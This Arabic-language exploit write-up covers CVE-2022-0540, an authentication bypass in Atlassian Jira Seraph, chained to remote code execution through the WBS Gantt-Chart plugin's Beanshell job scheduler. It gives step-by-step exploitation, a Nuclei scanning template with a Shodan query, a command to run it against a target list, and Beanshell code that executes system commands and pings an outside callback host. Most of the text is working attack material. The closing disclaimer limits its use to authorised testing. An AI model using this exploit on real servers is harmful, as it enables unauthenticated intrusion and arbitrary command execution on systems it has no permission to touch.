
Atlassian Jira Seraph تجاوز المصادقة وتنفيذ التعليمات البرمجية عن بُعد(CVE-2022-0540)
كما هو موضح في مدونة المؤلف، قدمت Atlassian قائمة طويلة من الإضافات المتأثرة (الغالبية العظمى منها كانت نتائج إيجابية كاذبة)، وأدرج المؤلف العديد من الإضافات المتأثرة الفعلية

وفقًا للشروط الموضحة، وبالاقتران مع التوثيق الرسمي لـ WBS Gantt-Chart for Jira

بشكل أساسي، إنها ثغرة تنفيذ الأكواد عن بُعد (RCE) باستخدام نص Beanshell الخاص بوحدة جدولة المهام Task، وتفاصيل الاستغلال كما يلي.
Proxy > Options > Match and Replace، وتعديل القاعدة.
http://IP:PORT/secure/WBSGanttManageScheduleJobAction.jspa; ثم يمكنك التحقق من job scheduler configuration
نظرًا لأن نص Beanshell النهائي يتم تنفيذه كمهمة مجدولة، يمكنك تعديل فترة التنفيذ لراحتك من خلال النقر على Edit وتعديلها وفقًا لتنسيق Cron.


بعد اكتمال التكوين، انقر على Update ولكن سيتم الانتقال إلى صفحة تسجيل الدخول، لا تقلق، فقد تمت إضافة Task فعليًا في الخلفية.

يكون Task المنشأ حديثًا بحالة Disable افتراضيًا، وتحتاج إلى تغييره إلى Enable يدويًا ثم الانتظار بضع ثوانٍ حتى يتم تنفيذ Script.

في الوقت نفسه، يمكنك العثور على رسالة تؤكد اكتمال التنفيذ في مجدول الوظائف.

المتطلبات الأساسية
WBS Gantt-Chart for Jira <= 9.14.3.1
id: CVE-2022-0540
info:
name: Atlassian Jira Seraph - Authentication Bypass Verify Exploitable(CVE-2022-0540)
author: DhiyaneshDK
severity: critical
description: |
Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request. This affects Atlassian Jira Server and Data Center versions before 8.13.18, versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0. This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18, versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0.
reference:
- https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0540
- https://confluence.atlassian.com/display/JIRA/Jira+Security+Advisory+2022-04-20
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0540
cwe-id: CWE-287
metadata:
shodan-query: http.component:"Atlassian Jira"
tags: cve,cve2022,atlassian,jira,exposure,auth-bypass
requests:
- method: GET
path:
- '{{BaseURL}}/secure/WBSGanttManageScheduleJobAction.jspa;'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'WBS Gantt-Chart'
- type: regex
regex:
- '<td headers="name">([.|\D]*?)</td>'
dsl: []
- type: status
status:
- 200
التشغيل التجريبي
nuclei -l targets.txt -t exploit.yaml
لقطة شاشة

نص Beanshell
import java.io.IOException;
import java.lang.*;
Runtime runtime = Runtime.getRuntime();
try {
String command = "ping -nc 1 55d2721a.dns.1433.eu.org";
if (System.getProperty("os.name").toLowerCase().contains("windows")) {
runtime.exec(new String[]{"cmd.exe", "/c", command});
} else {
runtime.exec(new String[]{"/bin/bash", "-c", command});
}
} catch (IOException e) {
e.printStackTrace();
}
المعلومات المذكورة في هذه المقالة مخصصة للاستخدام المشروع والمصرح به في اختبار الاختراق والفحوصات الأمنية الداخلية للشركات وأغراض البحث فقط. يتحمل المستخدم المسؤولية الكاملة عن أي عواقب سلبية تنشأ عن استخدام المعلومات الواردة في هذه المقالة.